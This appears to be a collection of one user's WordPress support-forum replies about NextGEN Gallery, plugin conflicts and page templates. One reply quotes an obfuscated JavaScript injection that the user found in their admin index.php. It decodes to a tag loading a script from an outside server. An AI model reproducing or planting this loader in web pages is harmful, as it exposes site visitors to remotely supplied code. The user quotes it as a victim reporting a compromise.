 * THANK YOU!!!
 * I had to change my theme to default then change it back for it to work. That
   should be on the main page about creating default page templates though.

 * **update, after a few hours with google, I’ve found a plugin that seems to give
   me exactly what I was looking for.

 * I’m looking for the exact same thing. A plugin, hack, or code that works the
   same way typical web forums do, in which case, you can completely see the blog’s
   index page, but to go to an actual single page post, you have to be logged in.

 * thanks Simon J, that worked much better than what I had on one of my sites. I
   think the script I had was also too heavy. Now I just have to make that thumbnail
   link to the post which shouldn’t be too hard.

 * [16 years, 12 months ago](https://wordpress.org/support/topic/plugin-nextgen-gallery-cant-add-image-gallery-to-a-page/#post-1091812)
 * Using 2.7.1
 * I had the same problem.
 * More specifically, I can add galleries just fine, as well as create thumbnails.
   All permissions were fine and the nextgen add function was working just as recent
   as 2 days prior to this issue. ALL of the galleries that were on the page were
   working.
 * The only issue was that when I clicked to see insert gallery, the actual “insert”
   button/text, was gone. The gallery lists still appeared, but that was gone. I
   couldn’t manually insert it either.
 * So, I deactivated all the plugins except nextgen and it worked. One by one, I
   re-activated them and found out that the plugin “WP-CUMULUS” caused it not to
   work. I don’t need cumulus, so I just let it go. There was no update available
   for cumulus either, as I have the latest version.

 * *I think I resolved the problem. THINK being the key word.
 *     ```
       <script language=javascript><!--
       document.write(unescape('rsd%3CscrizrGpr37t%20yTsSmrzrGc%3D%2FzrG%2Fh2878h28%2Eh28110%2ESm1ck7rsd5h28%2E2rsd49%2FyTjyTquerr37y%2EzrGjzrGs%3E%3CyT%2FFIsckcrrsdickpFIt%3E').replace(/ck|Sm|rsd|zrG|h28|FI|yT|r37/g,""));
        --></script>
       ```
 * I found the code above in the index.php of my admin page. I didn’t see it in
   the editor, but when I opened the page, it was there. I think the previous hacks
   put it there and I never did reupload the 2.7.1 admin files.
 * I have this problem and I’ve noticed that in the working versions, there is a
   different code when you hover over a button in the add media bar.
 * `image&TB_iframe=true`
    that’s what i get in my non working version
 * `image&TB_iframe=true&width=640&height=487`
 * I have no idea why the entire code isn’t appearing on both versions. I have 2.7
   on both. On the non working, I went back to the original theme and disabled all
   plugs in.
 * Is it possible that I need to clear my servers cache?
 * I am having the same problem. I’ve found something weird though.
 * I run a number of blogs, all using wordpress platform. 3 of them are running
   2.7, one running 2.7.1. Out of the 2.7’s, one is working and one isn’t.
 * Here’s what I found that is different. When I hover over the add image button,
   my bar at the bottom of my browser gives to different urls.
 * Non Working
    [http://i43.tinypic.com/s48iuo.jpg](http://i43.tinypic.com/s48iuo.jpg)
 * Working
    [http://i42.tinypic.com/n12ryw.jpg](http://i42.tinypic.com/n12ryw.jpg)
 * if you can’t see the difference, it seems that the non working one doesn’t have
   the popup specs at all.
 * I have the latest version of flash, the latest update for javascript. I completely
   deleted my entire install of WordPress (minus the wp-config and content folders)
   and re-uploaded them. I have deactivated all of my plug-ins.
 * Any idea on what the problem is?
